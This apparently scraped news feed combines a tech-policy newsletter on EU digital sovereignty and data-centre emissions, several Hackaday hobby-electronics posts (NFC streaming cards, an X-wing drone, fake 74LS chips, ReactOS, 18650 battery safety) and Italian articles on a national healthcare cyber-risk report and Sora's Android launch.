— Social media is no longer 'social.' That requires a rethink about how these platforms are overseen; How US tech companies are balancing domestic and international pledges on 'digital sovereignty;' Most governments don't have a plan to combat disinformation. More here.
— Get ready for the rise of a 'digital age of minority;' AI-powered deepfakes are getting harder detect — even if they have yet to affect democratic elections; The global "AI Stack" is quickly consolidating around select few firms. More here.
— The case for why everyone should double down on social media oversight despite the growing hype around artificial intelligence. More here.

Yet at its core, both countries are seeking to take a more hands-on approach to digital policymaking that focuses on digital public infrastructure, incentives tied to public tenders for technology contracts and greater government support for domestic companies to compete on the global stage. That could include nudging ministries to use local alternatives to American cloud providers like AWS or Google. It may involve government support for startups to hire the best talent and access new European (and global) markets. It could see officials actively embedding themselves in industrial policy decisions so that more high-end technology is built in Europe — as part of growing public support to wean the bloc off a perceived reliance on US Big Tech giants.

There's still uncertainty about what the communiqué that will arise from the Nov 18 event will say. US officials have been doing the rounds in EU capitals (and not just in Berlin and Paris) to warn national officials of promoting an "anti-American" slant to whatever Europe decides to do with its digital sovereignty ambitions. But, at its core, the summit will be dedicated to placing the government and policymakers at the center of digital policymaking changes to jumpstart the bloc's economy.

Contrast that to what the European Commission is slated to announce a day later on Nov 19 (though that date has yet to be officially confirmed.) As part of the Digital Omnibus, expect a slate of announcements to pare back Europe's digital rulebook in the name of economic growth.

There are rumors that parts of the AI Act will be shelved. I don't think that will happen. Instead, my bet is on a more protracted roll-out of the world's only comprehensive legislation for the emerging technology aimed at giving European firms more time to figure out their AI strategies. I would argue that few of these firms will be affected by the most stringent parts of the AI Act. But Henna Virkkunen, the European Commission's vice-president for technology sovereignty, security and democracy, has made it clear her priority when it comes to AI is about generating growth, not cumbersome regulation.

In other parts of the upcoming Digital Omnibus we'll also likely see other retrenchment from Europe's flaunted world-class digital regulation. This will be framed as unleashing the bloc's economic potential by making it easier for small- and medium-sized enterprises to sell their wares globally without falling afoul of the perceived excesses of digital regulation. Europe's privacy rules, in particular, will likely come under scrutiny because of the misunderstanding that such rules have made it harder for small firms to compete. When it comes to European bigger firms, that is certainly true. But I have seen little evidence to suggest that tough data protection rules, when implemented correctly, lead to burdensome oversight for smaller companies, almost all of which do not have to comply with the most stringent of oversight.

EU policymakers argue the dual events this month go hand-in-hand. That you can have a more top-down industrial policy directed by national leaders and an effort to reduce the digital regulatory burden to unleash the Continent's economic potential.

I don't buy that.

First, Europe needs to define what it wants out of its digital sovereignty agenda that remains divided between EU member countries' diverging interests and an inability to craft a coherent policymaking agenda when global competitors like the US and China are quickly moving ahead. Yes, the bloc is not a country, and such decisions are inherently slow. But Brussels has had more than five years to conjure up a digital sovereignty ethos, and it has failed to do so.

Second, the perception driven home by Draghi's competitiveness report that all digital regulation is harmful to the economy fundamentally misunderstands how Europe's digital economy works. It's not GDPR or the soon-to-be slow-rolled AI Act that is holding back Portugal or Sweden. It's the endemic failure of generations of EU policymakers to create a functioning digital single market that can allow European companies to leverage Continent-wide talent and financial resources.

Reining back digital rules may play into the politics of late 2025 when national leaders all want to <<checks talking points>> unleash the potential of AI onto society. But the Digital Omnibus will fail to grapple with the EU's underlying structural challenges that remain the main driver for why the bloc is third in the three-person race with China and the US on technology.

Until national leaders and policymakers clearly link their digital sovereignty ambitions with a well-thought-out strategy toward digital rulemaking, Europe's also-ran status is unlikely to change.

The two events later this month represent a missed opportunity to bring the dueling strategies — one pushing for greater government intervention, the other calling for less regulatory oversight — into one coherent message. That could have included finally articulating what a forward-looking digital sovereignty agenda would look like that focused on competitiveness, social cohesion and the promotion of Europe's fundamental values, at home and abroad.

Instead, the Nov 18 summit and the Nov 19 announcement will likely stand in contrast to one another as a sign that, again, the EU has failed to meet the opportunity presented by the US (the world's largest democratic power) pulling back from the global stage.


Chart of the week


LOBBYING IN BRUSSELS HAS NEVER BEEN at the same scale as what happens in Washington. In part, that's because the EU is not as transparent in forcing companies to disclose what they spend annually to nudge lawmakers in one way or another.

Still, tech companies have increased their collective lobbying spend by roughly one-third, to $174 million, in the latest 12 month period compared to 2023, according to figures collected by Corporate Europe Observatory and LobbyControl, two advocacy groups.

Below is the breakdown of the top spenders within the digital industry. It's not surprising that many on the list continue to face significant regulatory headwinds despite Brussels calming down on its appetite for more tech rules.
Europe's 'Jekyll and Hyde' tech strategySource: Corporate Europe Observatory; LobbyControlSource; EU Transparency Register


TECH INDUSTRY AND CLIMATE CHANGE


THE UNITED NATIONS ANNUAL CLIMATE CHANGE CONFERENCE will take place in Belén, Brazil from Nov 10-Nov 21. The outlook does not look good. As a lapsed climate change reporter, it's hard not to look at the current data and weep. The ten warmest years on record have all occurred between 2015-2024, according to data from the US NOAA National Centers for Environmental Information. Last year was the warmest year since global records began in 1850.

Yikes.

The tech industry, especially those firms powering the datacenter boom, must take responsibility for some of the current climate crisis.

Electricity consumption associated with datacenters, for instance, is expected to more than double by 2030, based on estimates from the International Energy Agency. By the end of the decade, that means these facilities, whose expansion is directly related to the AI boom currently engulfing the world, will need as much electricity, as a sector, as what Japan currently consumes in 2025. That's the same amount of electricity as the world's fourth largest economy.

Again, yikes.

Some of this datacenter boom will be powered by renewable energy like geothermal power. But in countries from Ireland to Chile, local residents are protesting the building of these facilities because of fears — and realities — that the new construction will either lead to rolling electricity blackouts or hikes in energy bills that will disproportionately harm lower income families.

The climate change risks are not just limited to electricity generation.

On everything from lithium battery production for electric vehicles to the waste produced by consumer electronic devices, the tech industry's effect on the wider environment can not be overstated. Yes, there are larger emitters, especially those associated with heavy industry and transport. But for a sector known for generating record profits (and now representing roughly a third of the overall market capitalization of the S&P 500 Index), the tech industry has significant cash stockpiles to address its climate change impact.

Sign up for Digital Politics


Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.


No spam. Unsubscribe anytime.

Some firms have started to do so. Many of the world's largest tech companies have best-in-class carbon offsetting programs and have invested billions in the reduction of so-called e-waste created by their consumer products. Still, it's not enough.

As national leaders and policymakers gather in Brazil for what is likely to be a damp squib of a climate conference, it's a reminder of the growing disconnect between the tech industry's climate change footprint and its ability to play a major role in averting the most harmful environmental impact — especially when 2024 was the first calendar year when the average global temperature exceeded 1.5°C above its pre-industrial levels.

Expect many of the companies to send representatives to Belén. It's a potentially good news story for some already investing in greener versions of tech infrastructure. But with total investment in data centers, alone, expected to hit almost $600 billion this year, it's hard to reconcile the growing carbon footprint of just one part of the tech industry and the stated green ambitions of the firms behind the current tech boom.


What I'm reading:


— Ahead of the upcoming social media ban for minors in Australia, the government conducted a feasibility study into whether it could implement so-called "age assurance" across the country. The results are here.

— The US Senate held another hearing into unproven claims that Big Tech companies worked with the federal government to censor mostly right-wing voices. Here's the transcript.

— The European Commission published its work plan for 2026, including major tech regulatory pushes like the Digital Fairness Act. More here.

— More than 70 countries signed the United Nations Cybercrime Convention on Oct 25 that had been criticized for failing to uphold basic fundamental rights. You can read the treaty here.

— Academics from Oxford University outlined a potential pathway forward in how the ways countries oversee artificial intelligence can be brought together. More here.



digitalpolitics.co/newsletter0…


CardFlix: NFC Cards for Kid-Friendly Streaming Magic


For most of us, the days of having to insert a disc to play our media are increasingly behind us. But if you’d like to provide your kids with the experience, you could use CardFlix.

For the electronics, [Udi] used the readily available ESP8266 D1 Mini module connected via I2C to a PN532 NFC reader. To trigger the different movies, there are over 50 cards, each with not only its unique NFC tag but also small posters that [Udi] printed showing the show and then laminated, ensuring they will survive plenty of use. The D1 Mini and NFC reader are housed in a 3D printed case, which ends up being almost smaller than the 5V DC adapter powering it, allowing it to be mounted above an outlet out of the way. The deck of movie cards is also housed in a pair of printed boxes: the larger one for the whole collection and a small one for the most often used shows. Should you want to print your own, all the design files are provided in the write-up.

The D1 Mini was programmed using ESPHome. This firmware allows it to easily connect back to Home Assistant, which does most of the heavy lifting for this project. When a card is scanned, Home Assistant can tell which TV the scanner was near, allowing this system to be used in more than one location. It also knows which card was scanned so it can play the right movie. Home Assistant also handles ensuring the TV in question is powered on, as well as figuring out what service should be called for that particular movie to be shown.

Be sure to check out some of the other projects we’ve featured that use ESPHome to automate tasks.

youtube.com/embed/_sqxoAX3GW0?…


hackaday.com/2025/11/05/cardfl…


Audio Sound Capture Project Needs Help


Audio field emission map

When you are capturing audio from a speaker, you are rarely capturing the actual direct output of such a system. There are reflections and artifacts caused by anything and everything in the environment that make it to whatever detector you might be using. With the modern computation age, you would think there would be a way to compensate for such artifacts, and this is what [d.fapinov] set out to do.

[d.fapinov] has put together a code base for simulating and reversing environmental audio artifacts made to rival systems, entirely orders of magnitude higher in cost. The system relies on similar principles used in radio wave antenna transmission to calculate the audio output map, called spherical harmonic expansion. Once this map is calculated and separated from outside influence, you can truly measure the output of an audio device.

The only problem is that the project needs to be tested in the real world. [d.fapinov] has gotten this far but is unable to continue with the project. A way to measure audio from precise locations around the output is required, as well as the appropriate control for such a device.

Audio enthusiasts go deep into this tech, and if you want to become one of them, check out this article on audio compression and distortion.


hackaday.com/2025/11/05/audio-…


La minaccia al settore sanitario italiano


L’Agenzia per la Cybersicurezza Nazionale ha aggiornato il Report sul rischio nel settore sanitario a cavallo del periodo che va da gennaio 2023 a settembre 2025, con nuovi dati, analisi e raccomandazioni.

🧠Il motivo è che il settore sanitario, a livello globale, continua a essere tra quelli maggiormente impattati in caso di attacchi cyber. In media, infatti, da gennaio 2023 si sono verificati 4,3 attacchi informatici al mese ai danni di strutture sanitarie. Di questi, circa la metà ha dato luogo a incidenti con un impatto effettivo sui servizi erogati (in termini di disponibilità e riservatezza), causandone talvolta il blocco con gravi ripercussioni a danno dell’utenza e mettendo a rischio la privacy dei pazienti.

👉 Nel periodo da gennaio 2025 a settembre 2025 il numero complessivo degli eventi cyber è aumentato di circa il 40% rispetto allo stesso intervallo del 2024. Il CSIRT Italia ha infatti censito 60 eventi a fronte dei 42 rilevati nell’anno recedente. Il numero di incidenti è però diminuito: 23 rispetto ai 47 del 2024, anno in cui un unico attacco di tipo supply chain causò 31 incidenti in altrettanti soggetti.

👉 Tra le principali tipologie di minacce rilevate nei primi nove mesi del 2025 ci sono: scansione attiva su credenziali, phishing, compromissione delle caselle e-mail e esposizione dati. Ciò a conferma della centralità del vettore e-mail e dell’utilizzo di tecniche basate sull’ingegneria sociale per la diffusione di campagne malevole. Gli attacchi di tipo ransomware, nel 2025, sono diminuiti, ma continuano a rappresentare la tipologia di minaccia con l’impatto più elevato.

🛡Il Report evidenzia che molti attacchi informatici hanno successo perché spesso vengono trascurate, o mal implementate, le più basilari misure di cybersicurezza con una carente formazione specifica del personale impiegato in ospedali, centri medici, cliniche e altre strutture sanitarie.
Per contrastare queste vulnerabilità, l’ACN suggerisce raccomandazioni mirate, tra cui la necessità di implementare pratiche di sicurezza robuste e una governance centralizzata della cybersecurity. Un approccio programmatico, basato sulla gestione del rischio e sulla separazione dei ruoli, è essenziale per rafforzare la sicurezza dei sistemi sanitari e prevenire gli incidenti informatici.

Leggi il report


dicorinto.it/agenzia-per-la-cy…


OpenAI rilasc’a l’APP Mobile di Sora su Android, disponibile in vari paesi


OpenAI ha rilasciato l’applicazione Sora per App Mobile su dispositivi Android. CNBC, ha riferito che l’app Sora di OpenAI è ora disponibile per il download tramite l’app store di Google Play e che l’app è disponibile negli Stati Uniti, in Canada, Giappone, Taiwan, Thailandia e Vietnam, inclusa la Corea.

Sora è stata rilasciata a settembre dell’anno scorso e ha superato 1 milione di download in meno di 5 giorni, mantenendo il primo posto nell’App Store di Apple per 3 settimane. Attualmente è al quinto posto tra le app gratuite di Apple, con ChatGPT al primo posto e Google Gemini al quarto, a dimostrazione del continuo predominio delle app basate sull’intelligenza artificiale.

OpenAI sta attualmente lavorando per rendere Sora disponibile per il download in Europa, ha scritto sul social media X Bill Pebbles, direttore di Sora presso OpenAI.

OpenAI ha dichiarato che Sora rappresenta “il prossimo passo nella generazione multimodale”, combinando la capacità di comprendere il linguaggio naturale con quella di produrre immagini e movimenti coerenti in un contesto visivo. L’app, nata inizialmente come piattaforma di ricerca, è diventata rapidamente un fenomeno di massa, con milioni di utenti che la utilizzano per creare brevi video realistici partendo da semplici descrizioni testuali.

L’interfaccia di Sora ricorda quella dei social network più popolari: un feed verticale dove scorrono i video generati dagli utenti, che possono essere “remixati”, commentati e condivisi. Secondo molti analisti, OpenAI starebbe puntando a trasformare Sora non solo in uno strumento di generazione video, ma in un vero e proprio ecosistema creativo, capace di competere con piattaforme come TikTok e Instagram Reels.

La possibilità di realizzare contenuti visivi con qualità quasi cinematografica, senza necessità di competenze tecniche o software professionali, ha suscitato entusiasmo ma anche preoccupazioni.

Diverse organizzazioni hanno infatti segnalato i rischi legati alla creazione di deepfake e alla diffusione di contenuti sintetici potenzialmente ingannevoli. OpenAI ha assicurato di aver introdotto watermark digitali e metadati C2PA per identificare i video generati da Sora, e ha implementato sistemi di controllo per prevenire l’abuso della piattaforma.

L'articolo OpenAI rilasc’a l’APP Mobile di Sora su Android, disponibile in vari paesi proviene da Red Hot Cyber.


Microsoft usa macOS per creare gli sfondi di Windows? Probabilmente si!


Il 29 ottobre Microsoft ha rilasciato uno sfondo per commemorare l’undicesimo anniversario del programma “Windows Insidere si ipotizza che sia stato creato utilizzando macOS.

Ricordiamo che Windows Insider è un programma ufficiale lanciato da Microsoft nel 2014 che permette agli utenti di testare in anteprima le nuove versioni di Windows prima del loro rilascio pubblico.

Gli iscritti — chiamati “Insider” — ricevono aggiornamenti sperimentali, funzioni in fase di sviluppo e build del sistema operativo non ancora definitive, contribuendo con feedback e segnalazioni di bug al miglioramento del software.

Il programma è aperto a tutti gli utenti con un account Microsoft e si articola in diversi canali (Canary, Dev, Beta e Release Preview), che offrono livelli differenti di stabilità e novità. In sostanza, è una comunità globale di tester e appassionati che aiutano Microsoft a perfezionare Windows, spesso anticipando funzionalità che arriveranno mesi dopo nelle versioni ufficiali.

Lo sfondo in questione, che vuole commemorare il programma, è stato pubblicato sull’account Microsoft Design X ed è disponibile in due colori, scuro e chiaro, e in due dimensioni. Sono disponibili quattro sfondi all’interno del file zip. Potete scaricarli dalla pagina degli sfondi di Microsoft Design.

Tuttavia, una volta estratto il file zip, è apparsa una cartella chiamata “__MACOSX”, che viene generata quando un file viene compresso utilizzando la funzione standard di macOS.

Questo ha portato alcuni utenti a chiedere: “Microsoft sta usando macOS per creare uno sfondo per Windows?”
Tweet di Microsoft Design che celebra gli 11 anni di “Windows Insider”
Questa cartella “__MACOSX” contiene i dati utilizzati da macOS per memorizzare le informazioni sulle impostazioni all’interno della cartella, il che indica che macOS è stato utilizzato almeno per il processo di compressione.

Non è chiaro se macOS sia stato effettivamente utilizzato per creare lo sfondo, ma viene spesso utilizzato in ambito design e probabilmente viene anche utilizzato dai grafici di Windows per realizzare la grafica degli ambienti Microsoft.
File zip “Windows Insider Program 11th Anniversary” aperto, scaricato dal sito di Microsoft Design
Sembrerebbe un po’ ironico se uno sfondo commemorativo di Windows fosse stato creato utilizzando macOS.

Non siamo certi di questa informazione, ma tutto lascia pensare che sia proprio così.

L'articolo Microsoft usa macOS per creare gli sfondi di Windows? Probabilmente si! proviene da Red Hot Cyber.


X-wing Aircraft Are Trickier Than They Look


The iconic X-wing ship design from Star Wars is something many a hobbyist have tried to recreate, and not always with success. While [German engineer] succeeded in re-imagining an FPV quadcopter as an X-wing fighter, the process also highlighted why there have been more failures than successes when it comes to DIY X-wing aircraft.

For one thing, the X-wing shape is not particularly aerodynamic. It doesn’t make a very good airplane. Quadcopters on the other hand rely entirely on precise motor control to defy gravity in a controlled way. It occurred to [German engineer] that if one tilts their head just so, an X-wing fighter bears a passing resemblance to a rocket-style quadcopter layout, so he set out to CAD up a workable design.
When flying at speed, the aircraft goes nearly horizontal and the resemblance to an X-wing fighter is complete.
One idea that seemed ideal but ultimately didn’t work was using four EDF (electric ducted fan) motors mounted in the same locations as the four cylindrical engines on an X-wing. Motors large enough to fly simply wouldn’t fit without ruining the whole look. A workable alternative ended up being the four props and brushless motors mounted on the ends of the wings, like you see here.

The unit still needed a lot of fine tuning to get to a properly workable state, but it got there. It takes off and lands vertically, like a classical quadcopter, but when flying at speed it levels out almost completely and looks just like an X-wing as it screams by. It’s in sharp contrast to the slow, methodical movements of this Imperial Shuttle drone.

There are also a couple design elements in [German engineer]’s build we thought were notable. The spring-loaded battery door (all 3D-printed, including the spring) looks handy and keeps the lines of the aircraft clean. And since it’s intended to be flown as an FPV (first person view) aircraft, the tilting camera mount in the nose swings the camera 90 degrees during takeoff and landing to make things a little easier on the pilot.

3D models for the frame (along with a parts list) are up for anyone who wants to give it a shot. Check it out in the video, embedded below.

youtube.com/embed/ocwTty_xnuc?…


hackaday.com/2025/11/04/x-wing…


The Headache of Fake 74LS Logic Chips


When you go on your favorite cheap online shopping platform and order a batch of 74LS logic ICs, what do you get? Most likely relabeled 74HC ICs, if the results of an AliExpress order by [More Fun Fixing It] on YouTube are anything to judge by. Despite the claims made by the somewhat suspect markings on the ICs, even the cheap component tester used immediately identified them as 74HC parts.

Why is this a problem, you might ask? Simply put, 74LS are Low-power Schottky chips using TTL logic levels, whereas 74HC are High-Speed CMOS, using CMOS logic levels. If these faked chips had used 74HCT, they would have been compatible with TTL logic levels, but with the TTL vs CMOS levels mismatch of 74HC, you are asking for trouble.

CMOS typically requires that high levels are at least 70% of Vcc, and low to be at most 30% of Vcc, whereas TTL high level is somewhere above 2.0V. 74HC also cannot drive its outputs as strongly as 74LC, which opens another can of potential issues. Meanwhile HCT can be substituted for LS, but with the same lower drive current, which may or may not be an issue.

Interestingly, when the AliExpress seller was contacted with these findings, a refund was issued practically immediately. This makes one wonder why exactly faked 74LS ICs are even being sold, when they’d most likely be stuffed into old home computers by presumably hardware enthusiasts with a modicum of skill and knowledge.

youtube.com/embed/yoV9hWPngzI?…


hackaday.com/2025/11/04/the-he…


A Paintball Turret Controlled Via Xbox Controller


Video games, movies, and modern militaries are all full of robotic gun turrets that allow for remotely-controlled carnage. [Paul Junkin] decided to build his own, albeit in a less-destructive paint-hurling fashion.

The turret sits upon a lazy susan bearing mounted atop a aluminium extrusion frame. A large gear is mounted to the bearing allowing the turret to pan when driven by a stepper motor. A pair of pillow block bearings hold a horizontal shaft which mounts the two paint markers, which again is controlled by another stepper motor to move in the tilt axis. An ESP32 microcontroller is responsible for running the show, panning and tilting the platform by commanding the large stepper motors. Firing the paintball markers is achieved with solenoids mounted to the triggers, which cycle fast enough to make the semi-auto markers fire in a way that almost feels like full-auto. Commanding the turret is via an Xbox One controller; communicating with the ESP32 over Bluetooth using the BluePad32 library.

It’s worth noting you shouldn’t shoot paintballs at unsuspecting individuals, since they can do extreme amounts of damage to those not wearing the proper protection. We’ve featured a great many other sentry guns over the years, too, like this impressive Portal-themed build. Video after the break.

youtube.com/embed/UVgqzoGp9NQ?…


hackaday.com/2025/11/04/a-pain…


Print in Place Pump Pushes Limits of Printing


Print in place pump being used next to ladder

3D printing has taken off into the hands of almost anyone with a knack for wanting something quick and easy. No more messing around with machining or complex assembly. However, with the general hands-off nature of most 3D prints, what could be possible with a little more intervention during the printing process? [Ben] from Designed to Make represents this perfectly with an entire centrifugal pump printed as one.

This project may not entirely fit into the most strict sense of “print in place”; however, the entire pump is printed as one print file. The catch is the steps taken during printing, where a bearing is placed and a couple of filament changes are made to allow dissolvable supports to be printed. Once these supports are dissolved away, the body is coated with epoxy to prevent any leakage.

Testing done by [Ben] showed more than impressive numbers from the experimental device. Compared to previous designs made to test impeller features, the all in one pump could stand its own against in most categories.

If you want to check out the project yourself, check out the Hackaday project here. One of the greatest parts of the open source 3D printing world is the absolute freedom and ingenuity that comes out of it, and this project is no exception. For more innovations, check out this DIY full color 3D printing!

youtube.com/embed/HDBhGS5r62c?…


hackaday.com/2025/11/04/print-…


2025 Component Abuse Challenge: Weigh With A TL074


The late and lamented [Bob Pease] was one of a select band of engineers, each of whose authority in the field of analogue integrated circuit design was at the peak of the art. So when he remarks on something in his books, it’s worth taking notice. It was just such an observation that caught the eye of [Trashtronic]; that the pressure on a precision op-amp from curing resin could be enough to change the device’s offset voltage. Could this property be used for something? The op-amp as a load cell was born!

The result is something of an op-amp torture device, resembling a small weighing machine with a couple of DIP-8 packages bearing the load. Surprisingly modest weights will change the offset voltage, though it was found that the value will drift over time.

This is clearly an experimental project and not a practical load cell, but it captures the essence of the 2025 Component Abuse Challenge of which it forms a part. Finding completely unexpected properties of components doesn’t always have to lead to useful results, and we’re glad someone had done this one just to find out whether or not it works. You still just about have time for an entry yourself if you fancy giving it a go.

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/04/2025-c…


Jenny’s Daily Drivers: ReactOS 0.4.15


When picking operating systems for a closer look here in the Daily Drivers series, the aim has not been to merely pick the next well-known Linux distro off the pile, but to try out the interesting, esoteric or minority OS. The need remains to use it as a daily driver though, so each one we try has to have at least some chance of being a useful everyday environment in which a Hackaday piece could be written. With some of them such as the then-current BSD or Slackware versions we tried for interest’s sake a while back that’s not a surprising achievement, but for the minority operating systems it’s quite a thing. Today’s choice, ReactOS 0.4.15, is among the closest we’ve come so far to that ideal.

For The N’th Time In The Last 20 Years, I download A ReactOS ISO

A Windows-style ReactOS desktop with a web browser showing HackadayIt’s fair to say there are still a few quirks, but it works.
ReactOS is an open-source clone of a Windows operating system from the early 2000s, having a lot on common with Windows XP. It started in the late 1990s and has slowly progressed ever since, making periodic releases that, bit-by-bit, have grown into a usable whole. I last looked at it for Hackaday with version 0.4.13 in 2020, so have five years made any difference? Time to download that ISO and give it a go.

Installing ReactOS has that bright blue and yellow screen feeling of a Windows install from around the millennium, but I found it to be surprisingly quick and pain free despite a few messages about unidentified hardware. The display driver it chose was a VESA one but since it supported all my monitor’s resolutions and colour depths that’s not the hardship it might once have been.

Once installed, the feeling is completely of a Windows desktop from that era except for the little ReactOS logo on the Start menu. I chose the classic Windows 95 style theme as I never liked the blue of Windows XP. Everything sits where you remember it and has the familiar names, and if you used a Microsoft computer in those days you’re immediately at home. There’s even a web browser, but since it’s the WINE version of Internet Explorer and dates from the Ark, we’re guessing you’ll want to replace it.

Most Of The Old Software You Might Need…

A Windows-like ReactOS desktop with the GIMP graphics packageHello GIMP 2.6, my old friend!
There’s a package manager to download and run open-source software, something which naturally Windows never had. Back in 2020 I found this to be the Achilies’ heel of the OS, with very little able to install and run without crashing, so i was very pleased to note that this situation has changed. Much of the software is out of date due to needing Windows XP compatibility, but I found it to be much more usable and stable. There’s a choice of web browsers but the Firefox and Chromium versions are too old to be useful, but I found its K-Meleon version to be the most recent of the bunch. Adding GIMP to my installed list, I was ready to try this OS as my daily driver.

I am very pleased to report that using K-Meleon and GIMP on ReactOS 0.4.15, I could do my work as a Hackaday writer and editor. This piece was in part written using it, and Hackaday’s WordPress backend is just the same as in Firefox on my everyday Manjaro Linux machine. There however the good news ends, because I’m sorry to report that the experience was at times a little slow and painful. Perhaps that’s the non-up-to-date hardware I’d installed it on, but it’s evident that 2025 tasks are a little taxing for an OS with its roots in 2003. That said it remained a usable experience, and I could just about do my job were I marooned on a desert island with my creaking old laptop and ReactOS.

… And It Works, Too!


So ReactOS 0.4.15 is a palpable hit, an OS that can indeed be a Daily Driver. It’s been a long time, but at last ReactOS seems mature enough to use. I have to admit that I won’t be making the switch though, but who should be thinking about it? I think perhaps back in 2020 I got it right, in suggesting that as a pretty good facsimile of Windows XP it is best thought of as an OS for people who need XP bur for whom the venerable OS is now less convenient. It’s more than just a retrocomputing platform, instead it’s a supported alternative to the abandonware original for anyone with hardware or software from that era which still needs to run. Just like FreeDOS is now the go-to place for people who need DOS, so if they continue on this trajectory, should ReactOS become for those needing a classic Windows. Given the still-installed rump of software and computer controlled machinery which runs XP, that could I think become a really useful niche to occupy.


hackaday.com/2025/11/04/jennys…


Rocket Roll Control, The Old Fashioned Way


The vast majority of model rockets go vaguely up and float vaguely downwards without a lot of control. However, [newaysfactory] built a few rockets that were altogether more precise in their flight, thanks to his efforts to master active roll control.

[newaysfactory] started this work a long time ago, well before Arduinos, ESP32s, and other highly capable microcontroller platforms were on the market. In an era when you had to very much roll your own gear from the ground up, he whipped up a rocket control system based around a Microchip PIC18F2553. He paired it with a L3G4200D gyro, an MPXH6115A barometer, and an MMA2202KEG accelerometer, chosen for its ability to provide useful readings under high G acceleration. He then explains how these sensor outputs were knitted together to keep a rocket flying straight and true under active control.

[newaysfactory] didn’t just master roll control for small rockets; he ended up leveraging this work into a real career working on fully-fledged autopilot systems. Sometimes your personal projects can take your career in interesting directions.

youtube.com/embed/AFb85zKAyqU?…


hackaday.com/2025/11/04/rocket…


Lithium-Ion Batteries: WHY They Demand Respect


This summer, we saw the WHY (What Hackers Yearn) event happen in Netherlands, of course, with a badge to match. Many badges these days embrace the QWERTY computer aesthetic, which I’m personally genuinely happy about. This one used 18650 batteries for power, in a dual parallel cell configuration… Oh snap, that’s my favourite LiIon cell in my favourite configuration, too! Surely, nothing bad could happen?

Whoops. That one almost caught me by surprise, I have to shamefully admit. I just genuinely love 18650 cells, in all glory they bring to hardware hacking, and my excitement must’ve blindsided me. They’re the closest possible entity to a “LiIon battery module”, surprisingly easy to find in most corners of this planet, cheap to acquire in large quantities, easy to interface to your projects, and packing a huge amount of power. It’s a perfect cell for many applications I and many other hackers hold dear.

Sadly, the 18650 cells were a bad choice for the WHY badge, for multiple reasons at once. If you’re considering building a 18650-based project, or even a product, let me show you what exactly made these cells a bad fit, and how you might be able to work around those limitations on your own journey. There’s plenty of technical factors, but I will tell you about the social factors, because these create the real dealbreaker here.

Three Thousand Participants


The main social factor can be boiled down to this – a 18650-powered WHY badge can start a fire through being touched by a 5 cent coin, a keychain, or a metal zipper of someone’s jacket. This is not a dealbreaker for an individual hacker who’s conscious of the risk, though it’s certainly an unwise choice. For three thousand participants? You have no chance.

A 18650 cell is like a bigger sister to an AA battery – power at your fingertips, just, you’re playing with heaps more power. You can take a 18650 cell and have it power a small yet nimble robot on wheels, or an ultra powerful flashlight, or a handheld radio packing quite a transmit power punch. You can release its power on accident, too, and that gets nasty quick.

Short-circuiting a 18650 cell is a surprisingly straightforward way to melt metal, and by extent, start a small fire. It’s also not that hard to short-circuit a 18650 cell, especially and specifically unprotected ones. This is a big part of why consumer oriented gadgets use AAs instead of 18650s – it’s perhaps less powerful, sure, but it’s also a significantly less dangerous cell.

The Instructions, They Do Nothing!


WHY sold a little over 3700 tickets. I would not expect 100% attendance, but I’m comfortable saying it must’ve been around three thousand people. Sadly, “three thousand people” is far beyond the point when you can hope to give people handling instructions for something as easy to mishandle as LiIon cells, even for a nominally hacker audience.

Of course, you can try and give people instructions. You can talk to each badge recipient individually, release booklets demonstrating what to do and not to do with a 18650 cell, add silkscreen instructions for a just-in-place reminder, or maybe have them sign a release form, though it’s unlikely that kind of trick would be legal in the EU. Sadly, WHY organizers never came close to doing any of these things. It also wouldn’t really matter if they did. These instructions will always, inevitably be outright ignored by a sizeable percentage of users.

Handling unprotected batteries requires cautiousness and some helper equipment. You can’t hope to transplant the cautiousness, at most you can try and issue the equipment. Which equipment? A small storage cases for the cells (must have when transporting them!), as well as a case for the badge, at the very least; to my knowledge, the WHY didn’t issue either of these stock. An ESD bag doesn’t qualify if it doesn’t permanently cover the badge’s back, because any temporary protection is nullified by a budding hacker getting tired of carrying two 18650 cells on their neck, and throwing the badge into the tent without looking. Where does it land? Hopefully not onto something metal.

You can build a badge or any sort of other device using unprotected 18650s, which expects the end user to handle them, like the WHY badge does, and it will be more or less safe as long as the end user is yourself, with 18650 handling experience that I’m sure is to match. Giving it to a friend, caseless? You can talk to your friend and explain 18650 handling basics to them, sure, but you’re still running some degree of risk. My hunch is, your friend could very well refuse such a gift outright. Giving it to a hundred people? You’re essentially playing with fire at someone else’s house.

Just Why Did That Happen?


Hackaday has traditionally used AA cells for our badges, which has definitely help us mostly avoid any Lithium-related issues. Most other conferences have been using pouch cells, which traditionally come with short-circuit protection and don’t threaten to ignite stuff from contact with a piece of metal. 18650 cells are not even cheaper at scale – they’re nice, sure, I wrote as much, but those nice things are quickly negated by the whole “firestarter” thing.

On the other hand, 18650 cells do work for a hacker or a small team of hackers skilled enough to stay cautious, and it also works well at scale when the cell is permanently encased within the shell, like in most powerbanks and laptops. It fails as soon as you expect people to plug batteries in and out, or carry them separately. Respecting Lithium-Ion batteries means being aware of their shortcomings, and for 18650 cells, that means you should avoid having people manually handle them at scale.

Here’s the kicker about the WHY badge situation. I was confused by the WHY badge switching to 18650 cells this year, away from overcurrent-protected pouch cells, which were used by previous iterations of WHY (MCH, SHA) without an issue in sight. So, I’ve asked around, and what I got from multiple sources is – the 18650 usage decision was pushed top-down, with little regard for physical safety. Sadly, this makes sense – it’s how we saw it implemented, too.


hackaday.com/2025/11/04/lithiu…


Making Audible Sense Of A Radiation Hunt


The clicking of a Geiger counter is well enough known as a signifier of radioactive materials, due to it providing the menacing sound effect any time a film or TV show deals with radiation. What we’re hearing is the electronic detection of an ionization event in a Geiger-Muller tube due to alpha or beta radiation, which is great, but we’re not detecting gamma radiation.

For that a scintillation detector is required, but these are so sensitive to background radiation as to make the clicking effect relatively useless as an indicator to human ears. Could a microcontroller analyse the click rate and produce an audible indication? This is the basis of [maurycyz]’s project, adding a small processor board to a Ludlum radiation meter.

When everything sounds like a lot of clicks, an easy fix might be to use a divider to halve the number and make concentrations of clicks sound more obvious. It’s a strategy with merit, but one that results in weaker finds being subsumed. Instead the approach here is to take a long-term background reading, and compare the instantaneous time between clicks with it. Ths any immediate click densities can be highlighted, and those which match the background can be ignored. SO in goes an AVR128 for which the code can be found at the above link.

The result is intended for rock prospecting, a situation where it’s much more desirable to listen to the clicks than look at the meter as you scan the lumps of dirt. It’s not the first project in this line we’ve brought you, another one looked at the scintillation probe itself.


hackaday.com/2025/11/04/making…


